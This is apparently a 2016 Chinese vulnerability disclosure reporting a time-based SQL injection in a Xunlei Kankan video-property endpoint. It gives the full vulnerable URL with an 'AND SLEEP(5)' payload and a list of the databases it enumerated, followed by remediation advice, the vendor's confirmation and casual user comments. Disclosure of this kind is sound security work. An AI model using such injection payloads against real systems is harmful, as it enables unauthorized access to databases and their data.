响巢看看某处SQL注入

http://videoproperty.xmp.kankan.com:8001/getinfo.lua?cid=4FB05962EE9E7B5F07ED3403AC1ABC22A0839892&filesize=14844951 AND SLEEP(5)

等5秒

证明注入点:

root权限

available databases [6]:

[*] gcidcid_map

[*] information_schema

[*] mysql

[*] test

[*] videoproperty

[*] videoproperty_20151116

使用参数检查的方式，拦截带有SQL语法的参数传入应用程序

使用预编译的处理方式处理拼接了用户参数的SQL语句

在参数即将进入数据库执行之前，对SQL语句的语义进行完整性检查，确认语义没有发生变化

在出现SQL注入漏洞时，要在出现问题的参数拼接进SQL语句前进行过滤或者校验，不要依赖程序最开始处防护代码

定期审计数据库执行日志，查看是否存在应用程序正常逻辑之外的SQL语句执行

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2016-03-21 10:51

厂商回复：

非常感谢，我们尽快修复！

最新状态：

暂无

1. 2016-04-06 21:34 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

   1

   爱你。

   1# 回复此人

2. 2016-04-07 09:35 | 珈蓝夜宇 ( 普通白帽子 | Rank:242 漏洞数:34 | 人不彻底绝望一次，就不会懂得什么是自己最...)

   1

   @从容 啊?爱我?

   2# 回复此人

3. 2016-04-07 09:46 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

   1

   @珈蓝夜宇 嗯 爱你

   3# 回复此人

4. 2016-04-07 10:15 | 珈蓝夜宇 ( 普通白帽子 | Rank:242 漏洞数:34 | 人不彻底绝望一次，就不会懂得什么是自己最...)

   1

   @从容 啊,大表哥,你这样让我受宠若惊啊. 你是响巢看看的呀?

   4# 回复此人

5. 2016-04-07 15:46 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

   1

   @珈蓝夜宇 不是啊，就是对你好奇

   5# 回复此人

6. 2016-04-07 16:10 | 珈蓝夜宇 ( 普通白帽子 | Rank:242 漏洞数:34 | 人不彻底绝望一次，就不会懂得什么是自己最...)

   1

   @从容 啊 那我们可以加个qq来吹牛的

   6# 回复此人

7. 2016-04-07 16:36 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

   1

   @从容 @珈蓝夜宇 你们应该加淡蓝

   7# 回复此人